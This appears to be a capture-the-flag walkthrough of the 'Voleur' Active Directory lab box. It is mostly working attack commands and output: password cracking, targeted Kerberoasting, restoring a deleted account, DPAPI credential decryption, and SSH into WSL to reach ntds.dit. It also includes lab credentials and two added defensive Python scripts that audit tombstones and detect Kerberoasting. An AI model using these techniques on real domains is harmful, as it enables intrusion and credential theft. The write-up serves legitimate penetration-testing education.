Initial Creds

As is common in real-life Windows pentests, you start the Voleur box with credentials for the following account:

ryan.naylor

HollowOct31Nyt

Enum

$ export IP=<IP>
 
$ rustscan --ulimit 10000 -a $IP -- -sCTV -Pn
 
*snip*
PORT      STATE SERVICE       REASON  VERSION
53/tcp    open  domain        syn-ack Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2025-07-06 03:05:44Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack
2222/tcp  open  ssh           syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 42:40:39:30:d6:fc:44:95:37:e1:9b:88:0b:a2:d7:71 (RSA)
| ssh-rsa *snip*
|   256 ae:d9:c2:b8:7d:65:6f:58:c8:f4:ae:4f:e4:e8:cd:94 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMkGDGeRmex5q16ficLqbT7FFvQJxdJZsJ01vdVjKBXfMIC/oAcLPRUwu5yBZeQoOvWF8yIVDN/FJPeqjT9cgxg=
|   256 53:ad:6b:6c:ca:ae:1b:40:44:71:52:95:29:b1:bb:c1 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILv295drVe3lopPEgZsjMzOVlk4qZZfFz1+EjXGebLCR
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
49664/tcp open  msrpc         syn-ack Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack Microsoft Windows RPC
49670/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
49671/tcp open  msrpc         syn-ack Microsoft Windows RPC
60910/tcp open  msrpc         syn-ack Microsoft Windows RPC
60918/tcp open  msrpc         syn-ack Microsoft Windows RPC
60938/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: Host: DC; OSs: Windows, Linux; CPE: cpe:/o:microsoft:windows, cpe:/o:linux:linux_kernel
 
Host script results:
| smb2-time:
|   date: 2025-07-06T03:06:39
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
|_clock-skew: 7h59m59s
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 58352/tcp): CLEAN (Timeout)
|   Check 2 (port 63857/tcp): CLEAN (Timeout)
|   Check 3 (port 52699/udp): CLEAN (Timeout)
|   Check 4 (port 44616/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
  • Update /etc/hosts
  • Fix the time skew (nmap reported 7h59m59s; Kerberos rejects clients more than 5 minutes out of sync with the KDC)
$ echo "$IP voleur.htb dc.voleur.htb DC.voleur.htb" | sudo tee -a /etc/hosts
$ sudo ntpdate $IP

Set up /etc/krb5.conf

[libdefaults]
    default_realm = VOLEUR.HTB
    forwardable = true

[realms]
    VOLEUR.HTB = {
        kdc = <IP>
    }

[domain_realm]
    .voleur.htb = VOLEUR.HTB
    voleur.htb  = VOLEUR.HTB

  • Get ticket with initial creds
$ getTGT.py -dc-ip $IP 'voleur.htb/ryan.naylor:HollowOct31Nyt'
 
Impacket v0.13.0.dev0+20250605.14806.5f78065 - Copyright Fortra, LLC and its affiliated companies
 
[*] Saving ticket in ryan.naylor.ccache
 
$ export KRB5CCNAME=ryan.naylor.ccache
  • SMB enumeration via Kerberos auth (the nxc banner shows NTLM:False, so NTLM logons are disabled)
$ nxc smb $IP --use-kcache --shares
SMB         10.129.27.164   445    DC               [*]  x64 (name:DC) (domain:voleur.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         10.129.27.164   445    DC               [+] VOLEUR.HTB\ryan.naylor from ccache
SMB         10.129.27.164   445    DC               [*] Enumerated shares
SMB         10.129.27.164   445    DC               Share           Permissions     Remark
SMB         10.129.27.164   445    DC               -----           -----------     ------
SMB         10.129.27.164   445    DC               ADMIN$                          Remote Admin
SMB         10.129.27.164   445    DC               C$                              Default share
SMB         10.129.27.164   445    DC               Finance
SMB         10.129.27.164   445    DC               HR
SMB         10.129.27.164   445    DC               IPC$            READ            Remote IPC
SMB         10.129.27.164   445    DC               IT              READ
SMB         10.129.27.164   445    DC               NETLOGON        READ            Logon server share
SMB         10.129.27.164   445    DC               SYSVOL          READ            Logon server share
 
$ nxc smb enum $IP --use-kcache --share IT --dir ""
SMB         10.129.27.164   445    DC               [*]  x64 (name:DC) (domain:voleur.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         10.129.27.164   445    DC               [+] VOLEUR.HTB\ryan.naylor from ccache
SMB         10.129.27.164   445    DC               Perms    File Size      Date                          File Path
SMB         10.129.27.164   445    DC               -----    ---------      ----                          ---------
SMB         10.129.27.164   445    DC               dr--     0              Wed Jan 29 04:10:01 2025      .
SMB         10.129.27.164   445    DC               dr--     0              Mon Jun 30 17:08:33 2025      ..
SMB         10.129.27.164   445    DC               dr--     0              Wed Jan 29 04:40:17 2025      First-Line Support
Running nxc against 2 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
 
$ nxc smb enum $IP --use-kcache --share IT --dir "First-Line Support"
SMB         10.129.27.164   445    DC               [*]  x64 (name:DC) (domain:voleur.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         10.129.27.164   445    DC               [+] VOLEUR.HTB\ryan.naylor from ccache
SMB         10.129.27.164   445    DC               Perms    File Size      Date                          File Path
SMB         10.129.27.164   445    DC               -----    ---------      ----                          ---------
SMB         10.129.27.164   445    DC               dr--     0              Wed Jan 29 04:40:17 2025      First-Line Support\.
SMB         10.129.27.164   445    DC               dr--     0              Wed Jan 29 04:10:01 2025      First-Line Support\..
SMB         10.129.27.164   445    DC               fr--     16896          Thu May 29 18:23:36 2025      First-Line Support\Access_Review.xlsx
Running nxc against 2 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
 
$ nxc smb $IP --use-kcache --get-file "First-Line Support/Access_Review.xlsx" "./Access_Review.xlsx" --share IT
SMB         10.129.27.164   445    DC               [*]  x64 (name:DC) (domain:voleur.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         10.129.27.164   445    DC               [+] VOLEUR.HTB\ryan.naylor from ccache
SMB         10.129.27.164   445    DC               [*] Copying "First-Line Support/Access_Review.xlsx" to "./Access_Review.xlsx"
SMB         10.129.27.164   445    DC               [+] File "First-Line Support/Access_Review.xlsx" was downloaded to "./Access_Review.xlsx"

User

  • File information
  • Crack xlsx hash with john
$ file Access_Review.xlsx
Access_Review.xlsx: CDFV2 Encrypted
 
$ /usr/share/john/office2john.py Access_Review.xlsx > excel.hash
 
$ john --wordlist=/usr/share/wordlists/rockyou.txt excel.hash
Using default input encoding: UTF-8
Loaded 1 password hash (Office, 2007/2010/2013 [SHA1 256/256 AVX2 8x / SHA512 256/256 AVX2 4x AES])
Cost 1 (MS Office version) is 2013 for all loaded hashes
Cost 2 (iteration count) is 100000 for all loaded hashes
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
football1        (Access_Review.xlsx)

XLSX

football1

  • Open in libreoffice or office with password
Account       | Role                           | Group                   | Notes
Ryan.Naylor   | First-Line Support Technician  | SMB                     | Has Kerberos Pre-Auth disabled temporarily to test legacy systems.
Marie.Bryant  | First-Line Support Technician  | SMB                     |
Lacey.Miller  | Second-Line Support Technician | Remote Management Users |
Todd.Wolfe    | Second-Line Support Technician | Remote Management Users | Leaver. Password reset to NightT1meP1dg3on14 and account deleted.
Jeremy.Combs  | Third-Line Support Technician  | Remote Management Users | Has access to Software folder.
Administrator | Administrator                  | Domain Admin            | Not to be used for daily tasks!

Service Account | Purpose            | Credentials / Notes
svc_backup      | Windows Backup     | Speak to Jeremy!
svc_ldap        | LDAP Services      | P/W – M1XyC9pW7qT5Vn
svc_iis         | IIS Administration | P/W – N5pXyW1VqM7CZ8
svc_winrm       | Remote Management  | Ask Lacey – she just reset it.

Creds

Todd.Wolfe : NightT1meP1dg3on14

svc_ldap : M1XyC9pW7qT5Vn

svc_iis : N5pXyW1VqM7CZ8

  • Todd's account has been deleted, so search the tombstones with the svc_ldap credentials (the 1.2.840.113556.1.4.417 control is LDAP_SERVER_SHOW_DELETED_OID, which makes the DC return deleted objects)
  • It cannot be restored yet with the users we currently have
$ ldapsearch -x -H ldap://$IP \
  -D "svc_ldap@voleur.htb" -w 'M1XyC9pW7qT5Vn' \
  -b "dc=voleur,dc=htb" \
  -s sub \
  -E '!1.2.840.113556.1.4.417' \
  "(isDeleted=TRUE)"
 
# extended LDIF
#
# LDAPv3
# base <dc=voleur,dc=htb> with scope subtree
# filter: (isDeleted=TRUE)
# requesting: ALL
#
 
# Deleted Objects, voleur.htb
dn: CN=Deleted Objects,DC=voleur,DC=htb
objectClass: top
objectClass: container
cn: Deleted Objects
description: Default container for deleted objects
distinguishedName: CN=Deleted Objects,DC=voleur,DC=htb
instanceType: 4
whenCreated: 20250129084227.0Z
whenChanged: 20250129124442.0Z
uSNCreated: 5659
isDeleted: TRUE
uSNChanged: 13005
showInAdvancedViewOnly: TRUE
name: Deleted Objects
objectGUID:: tNh8WGpv2UaL1I+zHS4Y2A==
systemFlags: -1946157056
objectCategory: CN=Container,CN=Schema,CN=Configuration,DC=voleur,DC=htb
isCriticalSystemObject: TRUE
dSCorePropagationData: 16010101000000.0Z
 
# Todd Wolfe
DEL:1c6b1deb-c372-4cbb-87b1-15031de169db, Deleted Objects, voleur.
 htb
dn: CN=Todd Wolfe\0ADEL:1c6b1deb-c372-4cbb-87b1-15031de169db,CN=Deleted Object
 s,DC=voleur,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn:: VG9kZCBXb2xmZQpERUw6MWM2YjFkZWItYzM3Mi00Y2JiLTg3YjEtMTUwMzFkZTE2OWRi
sn: Wolfe
description: Second-Line Support Technician
givenName: Todd
distinguishedName: CN=Todd Wolfe\0ADEL:1c6b1deb-c372-4cbb-87b1-15031de169db,CN
 =Deleted Objects,DC=voleur,DC=htb
instanceType: 4
whenCreated: 20250129090806.0Z
whenChanged: 20250706095139.0Z
displayName: Todd Wolfe
uSNCreated: 12863
isDeleted: TRUE
uSNChanged: 131227
name:: VG9kZCBXb2xmZQpERUw6MWM2YjFkZWItYzM3Mi00Y2JiLTg3YjEtMTUwMzFkZTE2OWRi
objectGUID:: 6x1rHHLDu0yHsRUDHeFp2w==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 133962686506585744
pwdLastSet: 133826280731790960
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAA+eMb6mZhtk8nnM2lVgQAAA==
accountExpires: 9223372036854775807
logonCount: 13
sAMAccountName: todd.wolfe
userPrincipalName: todd.wolfe@voleur.htb
lastKnownParent: OU=Second-Line Support Technicians,DC=voleur,DC=htb
dSCorePropagationData: 20250706094137.0Z
dSCorePropagationData: 20250706080448.0Z
dSCorePropagationData: 20250706074204.0Z
dSCorePropagationData: 20250513231110.0Z
dSCorePropagationData: 16010714042016.0Z
lastLogonTimestamp: 133962613904629910
msDS-LastKnownRDN: Todd Wolfe
 
# search reference
ref: ldap://ForestDnsZones.voleur.htb/DC=ForestDnsZones,DC=voleur,DC=htb
 
# search reference
ref: ldap://DomainDnsZones.voleur.htb/DC=DomainDnsZones,DC=voleur,DC=htb
 
# search reference
ref: ldap://voleur.htb/CN=Configuration,DC=voleur,DC=htb
 
# search result
search: 2
result: 0 Success
 
# numResponses: 6
# numEntries: 2
# numReferences: 3
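The ldapsearch output above is LDIF, and two things in it trip up quick-and-dirty parsing: long values are folded onto continuation lines (a leading single space), and the tombstone CN contains a literal newline ("\0A" in the DN), which is why the "# Todd Wolfe" comment line is split across two lines. The following parser is an added example, not part of the original writeup: it reads a trimmed copy of that output (embedded as a constructed sample), unfolds the lines, decodes the base64 ("::") attributes, and reports each tombstoned user with its original OU and whether the account was disabled before deletion. The userAccountControl value 66048 seen above has no disable bit set, which is exactly why the restored account came back enabled later in the writeup.

```python
import base64
import re

# Constructed sample: a trimmed copy of the ldapsearch output above (the Deleted Objects
# container, Todd Wolfe's tombstone, one referral and the result block). A raw string
# keeps the "\0A" DN escape literal.
SAMPLE_LDIF = r"""
# extended LDIF
#
# LDAPv3
# filter: (isDeleted=TRUE)
#

# Deleted Objects, voleur.htb
dn: CN=Deleted Objects,DC=voleur,DC=htb
objectClass: top
objectClass: container
cn: Deleted Objects
isDeleted: TRUE

# Todd Wolfe
DEL:1c6b1deb-c372-4cbb-87b1-15031de169db, Deleted Objects, voleur.
 htb
dn: CN=Todd Wolfe\0ADEL:1c6b1deb-c372-4cbb-87b1-15031de169db,CN=Deleted Object
 s,DC=voleur,DC=htb
objectClass: top
objectClass: person
objectClass: user
cn:: VG9kZCBXb2xmZQpERUw6MWM2YjFkZWItYzM3Mi00Y2JiLTg3YjEtMTUwMzFkZTE2OWRi
sn: Wolfe
isDeleted: TRUE
userAccountControl: 66048
sAMAccountName: todd.wolfe
userPrincipalName: todd.wolfe@voleur.htb
lastKnownParent: OU=Second-Line Support Technicians,DC=voleur,DC=htb
msDS-LastKnownRDN: Todd Wolfe

# search reference
ref: ldap://ForestDnsZones.voleur.htb/DC=ForestDnsZones,DC=voleur,DC=htb

# search result
search: 2
result: 0 Success
"""

UF_ACCOUNTDISABLE = 0x0002  # userAccountControl bit for a disabled account


def unfold(lines):
    """Join LDIF continuation lines (leading single space) onto the line before them."""
    out = []
    for line in lines:
        if line.startswith(" ") and out:
            out[-1] += line[1:]
        else:
            out.append(line)
    return out


def parse_ldif(text):
    """Parse ldapsearch LDIF into a list of {attribute: [values]} dicts, one per entry.

    Records are separated by blank lines. Anything before the first 'dn:' line of a
    record is dropped: that is where ldapsearch comments live, including the orphaned
    'DEL:...' fragment left behind when a tombstone CN embeds a newline. Values written
    with '::' are base64 and are decoded (as UTF-8 when possible, otherwise as hex).
    """
    entries = []
    for block in re.split(r"\n\s*\n", text.strip()):
        lines = unfold(block.splitlines())
        start = next((i for i, ln in enumerate(lines) if ln.startswith("dn:")), None)
        if start is None:
            continue  # comment-only, referral or result block, not an entry
        entry = {}
        for line in lines[start:]:
            if line.startswith("#") or ":" not in line:
                continue
            name, rest = line.split(":", 1)
            if rest.startswith(":"):
                raw = base64.b64decode(rest[1:].strip())
                try:
                    value = raw.decode("utf-8")
                except UnicodeDecodeError:
                    value = raw.hex()
            else:
                value = rest.strip()
            entry.setdefault(name, []).append(value)
        entries.append(entry)
    return entries


def deleted_users(entries):
    """Summarise tombstoned user objects: name, original container, and whether the
    account was disabled before deletion. A leaver whose tombstone is still enabled is
    one Restore-ADObject away from a working login, which is the audit point here."""
    found = []
    for e in entries:
        if e.get("isDeleted", [""])[0] != "TRUE" or "user" not in e.get("objectClass", []):
            continue
        uac = int(e.get("userAccountControl", ["0"])[0])
        found.append({
            "sAMAccountName": e.get("sAMAccountName", [None])[0],
            "rdn": e.get("msDS-LastKnownRDN", [None])[0],
            "lastKnownParent": e.get("lastKnownParent", [None])[0],
            "disabled": bool(uac & UF_ACCOUNTDISABLE),
        })
    return found


if __name__ == "__main__":
    for user in deleted_users(parse_ldif(SAMPLE_LDIF)):
        print(user)
```

Run it as-is to see the single tombstoned user, or pipe real ldapsearch output into parse_ldif; the same isDeleted filter plus a periodic run is a cheap way to review which leavers' accounts sit in the Deleted Objects container still enabled.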
$ getTGT.py -dc-ip $IP 'voleur.htb/svc_ldap:M1XyC9pW7qT5Vn'
 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
 
[*] Saving ticket in svc_ldap.ccache
 
$ export KRB5CCNAME=svc_ldap.ccache
 
$ python3 targetedKerberoast.py -v -d voleur.htb -u svc_ldap -k --no-pass --dc-ip $IP --dc-host dc.voleur.htb --request-user svc_winrm -o svc_winrm.hash
[*] Starting kerberoast attacks
[*] Attacking user (svc_winrm)
[VERBOSE] SPN added successfully for (svc_winrm)
[+] Writing hash to file for (svc_winrm)
[VERBOSE] SPN removed successfully for (svc_winrm)
 
$ cat svc_winrm.hash
$krb5tgs$23$*svc_winrm$VOLEUR.HTB$voleur.htb/svc_winrm*$608cee01816bf1b974d651360541b9e2$*snip*
  • Crack Hash
$ hashcat -m 13100 svc_winrm.hash /usr/share/wordlists/rockyou.txt
*snip*
AFireInsidedeOzarctica980219afi
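The targetedKerberoast run above leaves two distinct traces on the domain controller: the SPN is written to svc_winrm and removed again seconds later (event 5136, directory object modified, provided the "Audit Directory Service Changes" subcategory and a SACL on user objects are in place), and the service ticket is requested with RC4-HMAC (event 4769 with TicketEncryptionType 0x17, the "23" in the $krb5tgs$23$ hash). The detection below is an added example, not part of the original writeup; the events are constructed samples in the flattened key/value shape a SIEM typically exposes, with OperationType shown as its rendered text ("Value Added" / "Value Deleted"). It pairs short-lived SPN additions with their removal and lists the RC4 ticket requests made against that account while the SPN existed.

```python
from datetime import datetime, timedelta

RC4_HMAC = "0x17"  # TicketEncryptionType in event 4769 for RC4-HMAC (Kerberos etype 23)
SPN_ATTR = "servicePrincipalName"

# Constructed sample events (not logs taken from the box).
# 5136 = directory service object modified; 4769 = Kerberos service ticket requested.
SAMPLE_EVENTS = [
    {"EventID": 5136, "Time": "2025-07-06T10:01:02", "SubjectUserName": "svc_ldap",
     "ObjectDN": "CN=svc_winrm,CN=Users,DC=voleur,DC=htb",
     "AttributeLDAPDisplayName": SPN_ATTR, "AttributeValue": "voleur.htb/svc_winrm",
     "OperationType": "Value Added"},
    {"EventID": 4769, "Time": "2025-07-06T10:01:03", "TargetUserName": "svc_ldap@VOLEUR.HTB",
     "ServiceName": "svc_winrm", "TicketEncryptionType": RC4_HMAC},
    {"EventID": 5136, "Time": "2025-07-06T10:01:04", "SubjectUserName": "svc_ldap",
     "ObjectDN": "CN=svc_winrm,CN=Users,DC=voleur,DC=htb",
     "AttributeLDAPDisplayName": SPN_ATTR, "AttributeValue": "voleur.htb/svc_winrm",
     "OperationType": "Value Deleted"},
    # Benign noise: an AES-256 (0x12) ticket for the DC's own account, and an SPN an
    # admin added and left in place (no matching removal, so never paired).
    {"EventID": 4769, "Time": "2025-07-06T10:05:00", "TargetUserName": "ryan.naylor@VOLEUR.HTB",
     "ServiceName": "DC$", "TicketEncryptionType": "0x12"},
    {"EventID": 5136, "Time": "2025-07-06T10:06:00", "SubjectUserName": "Administrator",
     "ObjectDN": "CN=svc_iis,CN=Users,DC=voleur,DC=htb",
     "AttributeLDAPDisplayName": SPN_ATTR, "AttributeValue": "HTTP/web.voleur.htb",
     "OperationType": "Value Added"},
]


def _ts(event):
    return datetime.fromisoformat(event["Time"])


def transient_spns(events, window=timedelta(minutes=10)):
    """Pair each 'Value Added' on servicePrincipalName with a later 'Value Deleted' of the
    same value on the same object inside `window`. An SPN that exists for seconds is the
    footprint of targeted Kerberoasting: add SPN, request ticket, remove SPN."""
    pending, hits = {}, []
    for e in sorted(events, key=_ts):
        if e["EventID"] != 5136 or e.get("AttributeLDAPDisplayName") != SPN_ATTR:
            continue
        key = (e["ObjectDN"].lower(), e["AttributeValue"].lower())
        if e["OperationType"] == "Value Added":
            pending[key] = e
        elif e["OperationType"] == "Value Deleted" and key in pending:
            added = pending.pop(key)
            if _ts(e) - _ts(added) <= window:
                hits.append({"object": e["ObjectDN"], "spn": e["AttributeValue"],
                             "by": e["SubjectUserName"],
                             "added_at": _ts(added), "deleted_at": _ts(e)})
    return hits


def rc4_service_tickets(events):
    """4769 events issued with RC4-HMAC, the only ticket type hashcat mode 13100 cracks.
    Accounts restricted to AES via msDS-SupportedEncryptionTypes never produce one."""
    return [e for e in events
            if e["EventID"] == 4769 and e.get("TicketEncryptionType") == RC4_HMAC]


def kerberoast_alerts(events, window=timedelta(minutes=10)):
    """Correlate both signals: for every short-lived SPN, list who requested an RC4
    ticket for that account during the SPN's lifetime."""
    rc4 = rc4_service_tickets(events)
    alerts = []
    for hit in transient_spns(events, window):
        account = hit["object"].split(",")[0].split("=", 1)[1].lower()  # first RDN value
        requests = [t["TargetUserName"] for t in rc4
                    if t["ServiceName"].lower() == account
                    and hit["added_at"] <= _ts(t) <= hit["deleted_at"]]
        alerts.append({**hit,
                       "lifetime_s": (hit["deleted_at"] - hit["added_at"]).total_seconds(),
                       "rc4_requests": requests})
    return alerts


if __name__ == "__main__":
    for a in kerberoast_alerts(SAMPLE_EVENTS):
        print(f"{a['by']} added and removed {a['spn']} on {a['object']} within "
              f"{a['lifetime_s']:.0f}s; RC4 TGS requested by {a['rc4_requests']}")
```

The account doing the writes (svc_ldap here) is the one to look at: it needs write access to another principal's servicePrincipalName, which is a delegation worth reviewing on its own, and the RC4 ticket only exists because svc_winrm was not limited to AES.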

Creds

svc_winrm

AFireInsidedeOzarctica980219afi

  • Auth as svc_winrm and connect
$ kdestroy
 
$ echo 'AFireInsidedeOzarctica980219afi' | kinit svc_winrm@VOLEUR.HTB
 
$ evil-winrm -i DC.voleur.htb -r voleur.htb
 
*Evil-WinRM* PS C:\Users\svc_winrm\Documents> dir ../Desktop
 
 
    Directory: C:\Users\svc_winrm\Desktop
 
 
Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         1/29/2025   7:07 AM           2312 Microsoft Edge.lnk
-ar---          7/6/2025  12:40 AM             34 user.txt

Root

  • Restore the deleted Todd.Wolfe account
*Evil-WinRM* PS C:\Users\svc_winrm\Documents> Get-ADUser todd.wolfe
 
Cannot find an object with identity: 'todd.wolfe' under: 'DC=voleur,DC=htb'.
At line:1 char:1
+ Get-ADUser todd.wolfe
+ ~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (todd.wolfe:ADUser) [Get-ADUser], ADIdentityNotFoundException
    + FullyQualifiedErrorId : ActiveDirectoryCmdlet:Microsoft.ActiveDirectory.Management.ADIdentityNotFoundException,Microsoft.ActiveDirectory.Management.Commands.GetADUser
  • Use the svc_ldap creds to restore the deleted object (svc_winrm alone cannot)
*Evil-WinRM* PS C:\Users\svc_winrm\Documents> $secpass = ConvertTo-SecureString "M1XyC9pW7qT5Vn" -AsPlainText -Force; $cred = New-Object System.Management.Automation.PSCredential("svc_ldap@voleur.htb",$secpass)
Import-Module ActiveDirectory; Get-ADObject `
  -Filter "sAMAccountName -eq 'todd.wolfe'" `
  -IncludeDeletedObjects `
  -Credential $cred `
| Restore-ADObject -Credential $cred
  • Check again
*Evil-WinRM* PS C:\Users\svc_winrm\Documents> Get-ADUser todd.wolfe
 
 
DistinguishedName : CN=Todd Wolfe,OU=Second-Line Support Technicians,DC=voleur,DC=htb
Enabled           : True
GivenName         : Todd
Name              : Todd Wolfe
ObjectClass       : user
ObjectGUID        : 1c6b1deb-c372-4cbb-87b1-15031de169db
SamAccountName    : todd.wolfe
SID               : S-1-5-21-3927696377-1337352550-2781715495-1110
Surname           : Wolfe
UserPrincipalName : todd.wolfe@voleur.htb
  • Auth as Todd
  • Access IT share on smb
$ kdestroy
 
$ echo 'NightT1meP1dg3on14' | kinit todd.wolfe@VOLEUR.HTB
 
$ smbclient -k //dc.voleur.htb/IT
 
smb: \> ls
  .                                   D        0  Wed Jan 29 04:10:01 2025
  ..                                DHS        0  Mon Jun 30 17:08:33 2025
  Second-Line Support                 D        0  Wed Jan 29 10:13:03 2025
 
		5311743 blocks of size 4096. 881170 blocks available
  • File enumeration reveals Todd's archived profile, containing a DPAPI master key file and a credential blob
  • Grab both blobs and decrypt them locally with Todd's password and SID
$ smbget -k "smb://dc.voleur.htb/IT/Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Protect/S-1-5-21-3927696377-1337352550-2781715495-1110/08949382-134f-4c63-b93c-ce52efc0aa88"
 
$ smbget -k "smb://dc.voleur.htb/IT/Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Credentials/772275FAD58525253490A9B0039791D3"
 
$ dpapi.py masterkey \
  -file 08949382-134f-4c63-b93c-ce52efc0aa88 \
  -sid S-1-5-21-3927696377-1337352550-2781715495-1110 \
  -password 'NightT1meP1dg3on14'
 
Impacket v0.13.0.dev0+20250605.14806.5f78065 - Copyright Fortra, LLC and its affiliated companies
 
[MASTERKEYFILE]
Version     :        2 (2)
Guid        : 08949382-134f-4c63-b93c-ce52efc0aa88
Flags       :        0 (0)
Policy      :        0 (0)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)
 
Decrypted key with User Key (MD4 protected)
Decrypted key: 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83
 
$ dpapi.py credential \
  -file 772275FAD58525253490A9B0039791D3 \
  -key 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83
 
Impacket v0.13.0.dev0+20250605.14806.5f78065 - Copyright Fortra, LLC and its affiliated companies
 
[CREDENTIAL]
LastWritten : 2025-01-29 12:55:19+00:00
Flags       : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist     : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type        : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)
Target      : Domain:target=Jezzas_Account
Description :
Unknown     :
Username    : jeremy.combs
Unknown     : qT3V9pLXyN7W4m

Creds

jeremy.combs

qT3V9pLXyN7W4m

  • Auth again as jeremy.combs
 
$ kdestroy
 
$ echo 'qT3V9pLXyN7W4m' | kinit jeremy.combs@VOLEUR.HTB
 
$ smbclient -k //dc.voleur.htb/IT
 
smb: \> recurse ON
 
smb: \> ls
  .                                   D        0  Wed Jan 29 04:10:01 2025
  ..                                DHS        0  Mon Jun 30 17:08:33 2025
  Third-Line Support                  D        0  Thu Jan 30 11:11:29 2025
 
\Third-Line Support
  .                                   D        0  Thu Jan 30 11:11:29 2025
  ..                                  D        0  Wed Jan 29 04:10:01 2025
  id_rsa                              A     2602  Thu Jan 30 11:10:54 2025
  Note.txt.txt                        A      186  Thu Jan 30 11:07:35 2025
 
 
smb: \>  mget "Third-Line Support\"
Get directory Backups? y
Get file id_rsa? y
getting file \Third-Line Support\id_rsa of size 2602 as Third-Line Support/id_rsa (1.1 KiloBytes/sec) (average 3.3 KiloBytes/sec)
Get file Note.txt.txt? y
getting file \Third-Line Support\Note.txt.txt of size 186 as Third-Line Support/Note.txt.txt (0.4 KiloBytes/sec) (average 3.0 KiloBytes/sec)
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \Third-Line Support\Backups\*
  • Inspect the files
  • The Backups directory lists as empty (NT_STATUS_OBJECT_NAME_NOT_FOUND); maybe we lack access for now…
$ cat Note.txt.txt
Jeremy,
 
I`ve had enough of Windows Backup! I`ve part configured WSL to see if we can utilize any of the backup tools from Linux.
 
Please see what you can set up.
 
Thanks,
 
Admin
 
$ cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
*snip*
-----END OPENSSH PRIVATE KEY-----
  • SSH in with id_rsa as svc_backup (the spreadsheet's Windows Backup account; the note says WSL was set up)
  • SSH is on port 2222 per the initial scan
$ chmod 600 id_rsa
 
$ ssh -i id_rsa svc_backup@$IP -p 2222
  • View the Backups directory we could not see before
svc_backup@DC ~ sudo ls -la /mnt/c/IT/Third-Line\ Support/Backups/
 
total 0
drwxrwxrwx 1 svc_backup svc_backup 4096 Jan 30 08:11  .
dr-xr-xr-x 1 svc_backup svc_backup 4096 Jan 30 08:11  ..
drwxrwxrwx 1 svc_backup svc_backup 4096 Jan 30 03:49 'Active Directory'
drwxrwxrwx 1 svc_backup svc_backup 4096 Jan 30 03:49  registry
 
svc_backup@DC ~ sudo ls -la /mnt/c/IT/Third-Line\ Support/Backups/'Active Directory'
 
total 24592
drwxrwxrwx 1 svc_backup svc_backup     4096 Jan 30 03:49 .
drwxrwxrwx 1 svc_backup svc_backup     4096 Jan 30 08:11 ..
-rwxrwxrwx 1 svc_backup svc_backup 25165824 Jan 30 03:49 ntds.dit
-rwxrwxrwx 1 svc_backup svc_backup    16384 Jan 30 03:49 ntds.jfm
 
svc_backup@DC ~ sudo ls -la /mnt/c/IT/Third-Line\ Support/Backups/registry/
 
total 17952
drwxrwxrwx 1 svc_backup svc_backup     4096 Jan 30 03:49 .
drwxrwxrwx 1 svc_backup svc_backup     4096 Jan 30 08:11 ..
-rwxrwxrwx 1 svc_backup svc_backup    32768 Jan 30 03:30 SECURITY
-rwxrwxrwx 1 svc_backup svc_backup 18350080 Jan 30 03:30 SYSTEM
  • Copy ntds.dit and the SYSTEM/SECURITY hives to the local machine
cp "/mnt/c/IT/Third-Line Support/Backups/Active Directory/ntds.dit" /home/svc_backup/
cp "/mnt/c/IT/Third-Line Support/Backups/registry/SYSTEM" /home/svc_backup/
cp "/mnt/c/IT/Third-Line Support/Backups/registry/SECURITY" /home/svc_backup/
